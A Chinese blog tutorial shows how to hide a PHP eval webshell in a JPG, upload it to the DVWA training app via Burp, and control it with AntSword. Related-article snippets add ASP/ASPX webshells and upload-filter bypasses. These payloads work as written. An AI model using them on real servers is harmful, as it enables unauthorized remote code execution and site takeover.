上传图片格式一句话木马

最新推荐文章于 2025-02-25 12:04:00 发布
最新推荐文章于 2025-02-25 12:04:00 发布
阅读量1.3w 收藏 93
点赞数 15
分类专栏: 木马 文章标签: php windows linux 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46017292/article/details/116120156
版权
一、 随便找一张jpg图片在这里插入图片描述
二、 新建一个txt文档在这里插入图片描述
三、 在文本文档中写入一句话木马
本次实验使用的木马为password
<?php @eval($_POST['密码']);?>

在这里插入图片描述

四、 写入完成后将后缀名.txt改为.php在这里插入图片描述
五、 合并文件
通过CMD进入储存jpg文件和php文件的目录
命令格式: cd C:\muma
使用copy命令合并文件
命令格式: copy 图片.jpg/b + 木马.php/a 合成.jpg
最后输出合并的木马文件muma.jpg在这里插入图片描述
六、 打开靶场登陆DVWA
默认用户名admin
默认密码password在这里插入图片描述
七、更改安全性
左侧点击DVWA Security更改安全性 改为low点击 Submit 确定在这里插入图片描述
八、 准备上传
点击左侧的File Upload(文件上传)
然后将FoxyProxyBurp代理打开

FoxyProxy安装与配置
在这里插入图片描述

九、 开启BURP SUITE
kali直接在终端中输入burpsuite即可打开
Windows与mac端需要自行安装

在这里插入图片描述

十、 配置BURP
BURP内点击Proxy(代理)再点击Intercept(截断)之后等待数据包在这里插入图片描述
十一、 上传
点击浏览 选择刚刚合并出来的muma.jpg文件 然后点击上传或者(Upload)在这里插入图片描述
十二、BURP截包
点击上传后 浏览器开始无响应 开始BURP发现已经将数据包拦截了下来在这里插入图片描述
十三、 修改数据包
将下方抓到的宝muma.jpg改为muma.php然后点击右上角的放包(Forward)一直点击 直到变成灰色无法点击为止在这里插入图片描述
十四、 查看上传路径
红字提示上传文件到../../hackable/uploads/muma.php
当前URL栏中的路径为/xxx.xxx.xxx.xxx/DVWA/vulnerabilities/upload#
../的意思为返回上一级目录 两个../../代表返回前两个目录 也就代表返回到了/xxx.xxx.xxx.xxx/DVWA/目录
结合提供的路径得出 上传的完整路径为/xxx.xxx.xxx.xxx/DVWA/hackable/uploads/muma.php在这里插入图片描述
十五、 验证木马
在浏览器的URL栏中输入刚刚得出的路径 查看是否能得到反馈 出现信息 代表木马存在 然后复制下当前的URL地址等待连接在这里插入图片描述
十六、 连接木马
打开蚁剑 右键空白处 点击添加数据在这里插入图片描述
URL地址中粘贴刚刚复制的地址
连接密码填写制作一句话木马时设置的密码在这里插入图片描述
完成后点击添加
窗口自动关闭 下方显示添加数据成功在这里插入图片描述
双击添加的木马 出现文件列表 代表一句话木马上传并成功在这里插入图片描述
相关链接 FoxyProxy安装与配置

如有问题 还请见谅

注意:本实验仅供个人测试时使用 请勿用于非法用途

文件上传漏洞—一句话图片马制作
weixin_44431280的博客
02-28 1万+
文件上传漏洞—一句话图片马制作 提要:在文件上传漏洞中,通常需要上传脚本类型的文件至服务端执行,获取WebShell,但是通常网站会严格过滤脚本类型的文件,这个时候便可以通过图片马来突破。 简介:就是在图片格式文件(JPG,PNG和GIF等)中隐藏一句话木马,利用文件包含漏洞,Web容器解析漏洞和.htaccess文件解析成对应的脚本,达到可以被Web容器执行的效果。 利用场景:因为图片格式的文件默认是不会被Web容器解析的,所以通过需要借助到文件包含漏洞,Web容器解析漏洞和.htaccess文件。 图片
用bat制作图片马——一句话木马
AiENG_07的博客
11-29 1362
此命令关闭在控制台中回显命令,因此只有命令的输出可见,而不是命令本身。: 使用二进制拷贝将图像文件和 PHP 文件合并,并创建一个新的图像文件。使用 copy 命令将两个文件的内容合并,创建一个新的图像文件。: 提示用户将 PHP 文件拖放到窗口中,并按 Enter。: 提示用户确保图像文件和 PHP 文件位于相同的路径下。: 提示用户将图像文件拖放到窗口中,并按 Enter。提示用户输入图像文件和 PHP 文件的路径。: 用于接收用户输入的 PHP 文件路径。: 用于接收用户输入的图像文件路径。
一句话木马与图片马
野原新之助
01-16 6775
何为木马? 所谓木马,即向目标主机种植恶意软件或程序(木马),通过主机与目标主机上种植好的木马进行连接,建立一个shell,达到控制目标主机的目的。 比较著名的木马有冰河、灰鸽子等,这些木马都是对主机进行控制。 今天总结的一句话木马,是通过对目标站点、服务器植入木马文件,对网站进行渗透控制。 通常对网站的木马文件植入,都是利用文件上传漏洞进行植入的,先植入小马,再通过小马将大马植入。 小马 小马一...
PHP一句话木马绕过技巧
最新发布
qq_45392044的博客
02-25 1015
因此通过修改数据包,插入\0字符的形式,达到字符串截断的目的。此时我们的文件后缀为jpg,我们想要的时PHP,因此在第一行upload/后 + 1.php%00(php后跟%00,那么读取文件名时只会读取到.php,而不是.jpg,因此马子就会被当成一个php文件来执行)在Apache解析顺序中,是从右到左开始解析文件后缀,如果最右侧后缀名不可识别,就继续往左判断,直到遇到可以解析的文件后缀为止,所以如果上传的文件名类似1.php.xxx,因为xxx不可解析,所以向左解析php
一句话图片木马
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木马文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
图片写入一句话木马
qq_53065516的博客
03-28 6987
图片制作一句话木马: 1:选择一个图片用工具打开,winhex或者其他工具都可以,例如我选取一张图片用winhex打开,然后在其后写入一句话木马,在这里我的一句话木马是:<?php @eval($_POST['pass']);?> 可以发现成功写入。 将此文件上传入dvwa后,在D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads会发现出现我修改后的图片1.jpg 此时dvwa出现/…/hackable/uploads/1.jpg succesf
记一次对DZ的渗透.(一句话木马与图片,文件上传解析漏洞)
键盘的起始页
01-11 2026
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 文件上传后导致的常见安全问题一般有: 1)上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。 2)上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(其他通过类似方式控制策
一句话木马图片制作
Kyl2n的博客
11-05 2511
常见一句话木马php一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%> 使用工具: 一台能使用cmd命令的电脑 步骤1: 在记事本中加入一句话木马,保存。如:a.txt 准备一张图片(文件大小
图片一句话木马的简单制作
sweetie 的博客
11-11 1329
新建一个文件夹 其中放入一张图片,shell.php一句话木马,写入cmd的bat文件 shell.php中的一句话木马内容为 <?php @eval($_POST[sweetie]);?> 点击bat文件进入DOS命令,写入"copy 1.jpg/b+shell.php shell.jpg" 回车 ...
上传漏洞-一句话木马
Coisini的博客
05-30 8781
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
asp防止上传图片木马原理解析
10-23
通过读取文件的前几个字节(通常称为文件签名或魔数),可以判断文件的类型是否为常见的图片格式,如JPEG、GIF、BMP、PNG等。每种格式的图片文件都有特定的签名。以JPEG为例,通常以0xFFD8开头。代码中使用了数组来...
BugKu~二手交易市场:文件上传漏洞+一句话木马
xhxtalent的博客
10-20 1445
看到图片类型是jpeg,并且还有base64的加密,我们把一句话木马进行base64的加密并且修改文件类型为php上传上传成功,并且返回文件路径,将原始路径+/Uploads/heads/75f940ada20db345.php。到处随便点点看看,有没有什么疑似可以利用的地方。那么上传用户头像,有没有想到上传一个图片马的想法呢!很好我们已经连上了后台,在后台文件里查找一下flag吧。flag也出来了,这次的文件上传也就结束了。打开网站可以看到是一个类似于淘宝商城的页面。引入眼帘的是上传用户头像。
一句话木马原理与实战
V
07-30 3574
一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战 介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句话木马 php一句话木马:    <?php @eval($_POST[value]);?>    aspx一句话木马:   <%@ Page Language=“Jscript”%>   <%eval(Re...
如何制作图片一句话木马
qq_52676257的博客
03-09 3210
如何制作图片一句话木马 新建一个文件夹,在其中放入一张图片(图片后缀名只要是图片的那几个后缀名即可)和一句话木马,例如: 其中的一句话木马为 <?php @eval($_POST["value"]);?> 再写入一个cmd的bat文件 然后打开bat文件 并输入copy tp.jpg/b+yjh.php shell.jpg 这样就会在先前所建的文件夹里,得到了一张新的图片,我命名为了shell.jpg,这时我们就得到了所需要的图片一句话木马。 ...
创建一句话木马(图片马)
weixin_45571987的博客
04-04 1409
图片一句话木马的编写使用cmd命令行创建图片一句话木马 使用cmd命令行创建图片一句话木马 copy 1.jpg/b+1.php/a 5.jpg 这边图片木马就成功创建了
文件上传 webshell 各类型 一句话木马 图片马 制作 教程
weixin_44286136的博客
06-05 1万+
webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数 大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到 图片马:
一句话木马、中国菜刀、图片一句话制作、过狗一句话
热门推荐
weixin_44722125的博客
04-18 2万+
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
文件上传+一句话木马(图文学习笔记)
qq_43236906的博客
10-24 4508
文件上传+一句话木马(学习笔记) 漏洞描述 文件上传漏洞是指一些web应用程序中允许上传文本或其他指定资源到指定位置,上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。(摘自百度搜索) 例如有一个网站会出现以下的操作让其上传文件等,可利用上传文件过滤不严谨来插入木马等。 一句话木马PHP举例 <?php @eval($_POST['muma']); ?> eval()函数表示括号内的语句字符串什么的全都
一句话图片木马的制作
netuser1937的博客
12-19 1万+
一句话图片木马的制作
dvwa一句话木马上传失败
01-28
### 关于DVWA平台中一句话木马上传失败解决方案 在处理DVWA平台上的一句话木马上传失败问题时,需考虑多个方面来确保成功上传并执行恶意代码。通常情况下,这类问题可能源于服务器配置、文件权限设置或是特定的安全机制。 #### 修改字符编码以适应不同环境需求 有时修改`/DVWA/dvwa/includes`目录下的`dvwaPage.inc.php`文件中的字符集可以改善某些功能的表现形式。例如,将UTF-8更改为GBK或GB2312可能会帮助解决因字符编码差异引起的问题[^1]。然而这并不是针对木马上传的具体修复措施而是为了兼容性调整。 #### 利用已知漏洞绕过防护机制 对于DVWA这样的学习工具而言,其设计初衷是为了让使用者了解常见的Web应用安全风险点。因此,在尝试上传一句话木马之前应该先利用其他存在的漏洞(比如命令注入或者文件包含等),通过这些途径获取更高的控制权从而实现最终目的。具体来说可以通过构造特殊请求参数的方式绕过简单的验证逻辑: ```bash ?step=2&password_new=password&password_conf=password&Change=Change&passed_captcha=true ``` 此方法能够使表单提交过程跳过了CAPTCHA校验环节,进而增加了成功的几率[^4]。 #### 文件上传模块分析与利用 考虑到DVWA本身提供了专门用于测试文件上传漏洞的功能模块,如果想要在此基础上完成一句话木马的部署,则需要仔细研究该部分源码以及相关HTTP请求结构。一般来讲,默认情况下会存在较为严格的MIME类型检查和大小限制等因素制约着非法文件的成功上载;但是由于这是一个教学性质的应用程序,所以可能存在一些简化版的安全检测流程容易被突破[^2]。 一旦找到了合适的切入点之后就可以准备一个经过精心伪装过的PHP脚本作为payload,并将其命名为看似无害的形式以便顺利通过初步筛选阶段。当这个特制文件被放置到目标位置后便可通过浏览器访问触发其中嵌入的有效负载达到远程操控的效果[^3]。 需要注意的是上述操作仅适用于实验环境中合法授权范围内的安全性评估活动,请勿应用于任何未经授权的真实网络系统之上!
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Stars-Again

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值